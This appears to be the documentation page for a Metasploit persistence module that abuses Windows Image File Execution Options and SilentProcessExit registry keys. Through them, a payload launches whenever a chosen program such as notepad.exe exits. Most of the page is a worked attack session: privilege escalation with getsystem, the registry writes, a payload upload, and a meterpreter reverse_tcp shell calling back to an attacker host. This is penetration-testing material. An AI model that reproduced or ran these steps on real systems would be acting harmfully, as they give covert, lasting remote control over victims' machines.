## Description

This module leverages Windows debugging tools to cause a payload to launch
every time a specified binary exits.

The payload will execute at the same priv level as the launched binary.

## Vulnerable Target

Windows 7+ as elevated user

## Verification Steps
```
[*] Meterpreter session 8 opened (192.168.135.168:5555 -> 192.168.132.125:49675) at 2019-09-30 16:24:30 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > background
[*] Backgrounding session 8...
msf exploit(multi/handler) > use exploit/windows/local/persistence_image_exec_options 
msf exploit(windows/local/persistence_image_exec_options) > set image_file notepad.exe
image_file => notepad.exe
msf exploit(windows/local/persistence_image_exec_options) > set session 8
session => 8
msf exploit(windows/local/persistence_image_exec_options) > run

[*] Attempting Persistence on DESKTOP-D1E425Q via session ID: 8
[*] Payload pathname = C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe
[*] Writing GlobalFlag to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
[*] Writing ReportingMode to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe
[*] Writing MonitorProcess to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe
[*] Payload (7168 bytes) uploaded on DESKTOP-D1E425Q to C:\Users\msfuser\AppData\Local\Temp\xEaiLUS.exe
msf exploit(windows/local/persistence_image_exec_options) > show options

Module options (exploit/windows/local/persistence_image_exec_options):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   IMAGE_FILE    notepad.exe      yes       Binary to "debug"
   PATH                           no        Path to write binaries if if USE_INJECTION=false(%TEMP% by default).
   PAYLOAD_NAME                   no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   SESSION       8                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.135.168  yes       The listen address (an interface may be specified)
   LPORT     4545             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(windows/local/persistence_image_exec_options) > 

```
In another window, start a listener and then launch notepad.exe on the target.
Close notepad.exe and you should get a callback:

```
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4545 
[*] Sending stage (206403 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4545 -> 192.168.132.125:49679) at 2019-09-30 16:25:49 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```